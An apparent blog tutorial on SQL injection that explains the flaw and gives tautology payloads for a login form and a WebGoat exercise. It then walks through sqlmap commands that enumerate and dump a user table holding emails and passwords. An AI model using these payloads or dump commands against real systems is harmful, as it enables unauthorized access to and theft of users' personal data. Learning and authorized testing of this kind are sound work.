Hey everyone. Welcome in this brand new tutorial in which we are going to look at “SQL Injection”, one of the most dangerous web application vulnerability considered by the OWASP Top 10.
What really is SQL Injection?
SQL injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s query can then trick the interpreter into executing unintended commands or accessing data without any authorization from the site’s database.
The main purpose of SQL Injection is to dump the whole database to the attacker. Now it can be seriously dangerous. An attacker can change user’s credentials such as their passwords or can get the user’s credit card numbers and much more. The attacker can also delete the whole database and that can be a disaster for the company. That is why it has been considered as the most dangerous vulnerability because if exploited, personal data of each and every user is in danger.
Types of SQL Injections
SQL injection is generally divided into four sub-categories:
- Classic SQLI
- Blind or Inference SQL injection
- Database management system-specific SQLI
- Compounded SQLI
SQL Injection requires input fields to carry out the attack. An attacker needs to construct the input in such a way that it gets executed as a database command when being transmitted from the browser to the web application.
A successful SQL Injection attack requires the attacker to craft a syntactically correct SQL Query. If the application returns an error message when the attacker uses an incorrect query or give out the details of the database or the table name, then it is vulnerable to SQL Injection.
Many times it will happen that the application will show error but will hide the error details such as which database is being used or the version, then the tester must be able to reverse engineer the logic of the original query.
How to test for SQL Injection(manual testing)?
In order to perform SQL injection attack, we need to make a list of the inputs which interacts with the database server for accessing some data. It can be username and password in a login form, search queries etc.
Let’s consider an e-commerce website. A normal user will visit the website and log in to his account there to see the various offers only for him.
Now how does this log in really work in the background?
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
Consider the above query. This query takes the input data by the user and matches it with the information in the database. If both the username and password matches, then the user is given can log in else the access is denied.
Now what an attacker does here is to inject code in place of giving a valid username and password.
1' or '1' = '1 in place of username and 1' or '1' = '1 in place of password
So the query now becomes something like this,
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
Now if the application is vulnerable to SQL Injection it will return a set of values because the condition 1=1 will be always true.
One thing which will come in quite handy is if you can find out which database is the application using. There are syntactical differences between Oracle, MSSql, and MySQL distributions. That’s why some queries might not work as expected.
Now let’s see some practical SQL Injection.
Here is an example of String SQL injection from WebGoat.
In this task, we had to input the last name in such a way that it will be a syntactically correct SQL query which will then dump all the details from the database. Here, the query which is being used by the Database was also given. It won’t happen in real life. You have to try out by injecting different codes there so that you could get some error or information which can tell you which query is being used in the backend.
The query in this case was
SELECT * FROM user_data WHERE last_name = 'Your Name'
So we injected Smith' OR '1'='1 there and the query became
SELECT * FROM user_data WHERE last_name = 'Smith' OR '1'='1'
The next condition is always TRUE, so it gives out all the records from the database.
It’s just a simple example but this is how SQL injection works in general.
It will require a whole page to write a complete tutorial on SQL injection. So we will recommend you to check the different types of manual testing from this page. Meanwhile, check out some youtube tutorials and solve SQL injection problems from DVWA, WebGoat, and Mutillidae to get a hang of it.
SQL injection using Sqlmap
We just saw how manual testing works, but there is a wonderful automation tool known as SQLmap for finding and exploiting SQL vulnerabilities in a website.
Sqlmap is one of the most powerful and famous automation tools for SQL injection. The only thing that Sqlmap requires is a vulnerable URL. Sqlmap can extract the whole database, tables, columns and all the data inside these columns. For downloading and installing sqlmap go here.
Now, let’s consider a PHP page which has an id parameter which looks something like this:
If we try to insert a single quote in the id parameter in the URL to check if the application does anything unusual or show us some unexpected error messages,
If the developer did not escape the id parameter properly, then it will give us some error. Let’s consider for now that it works unexpectedly for the sake of this tutorial.
The first and basic command for Sqlmap is this one. The -u option is for the URL. This command will check if the parameter is really vulnerable to SQL injection or not.
$ python sqlmap.py -u "http://www.test.com/index.php?id=23"
This command will give us information like operating system, the database being used along with its version number. Now, we know that the parameter is vulnerable to SQL injection. So we dig a little deeper.
- Getting the databasesTo find out all the databases, we will use the following command. The --dbs is used for getting all the databases.$ python sqlmap.py -u "http://www.test.com/index.php?id=23" --dbslet’s assume that we get three databases:information_schema
- Getting the tables inside a databaseNow the next step is to find out all the tables inside a database. For this, we will use the below command:$ python sqlmap.py -u "http://www.test.com/index.php?id=23" --tables -D usersThe --table is for getting all the tables and -D option specifies the database which in this case is users. Let’s say we get 2 tables but we are interested in the one which has User’s personal information named the table personal.
- Getting the columns inside the tableTo get all the columns inside the table, we need to use the below command.$ python sqlmap.py -u "http://www.test.com/index.php?id=23" --columns -D users -T personalIt will give us the layout of the table.Column | Type |
- | email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
- Getting the data for each columnNow, this is what we hackers truly desire, the data. This command will dump the data of the entire table$ python sqlmap.py -u "http://www.test.com/index.php?id=23" --dump -D users -T personalThe output will look something like this:| id | hash | name | email | password |
| 1 | 5DIpzzDHFOwnCvPonu | admin | email@example.com | letmein |
- | 2 | 8DIpzhfDHFkyndCvPo | john | firstname.lastname@example.org | hackerxss |
These are the basic commands for Sqlmap. Sqlmap has several advanced features also, for this check their official page. There are tools like SqlNinja also. You can check that out also from here.
SQL injection is a very broad topic in itself. But it’s like a blessing for bug bounty hackers because companies will give a good amount of bounty if you can find a critical vulnerability such as SQL Injection. We will be writing on topics like Time Based SQL injection and various advanced SQL Injections in the meantime. Stay tuned for that. Also, if you have any queries or having any problems with SQL Injection please comment below and we will surely help you.
Till then, Happy hacking.:)